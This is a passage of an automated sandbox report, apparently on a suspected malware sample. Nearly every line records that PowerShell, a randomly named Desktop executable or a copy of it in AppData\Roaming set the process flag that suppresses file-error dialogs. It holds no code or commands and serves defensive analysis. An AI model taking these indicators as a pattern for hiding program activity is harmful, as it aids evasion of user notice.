                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
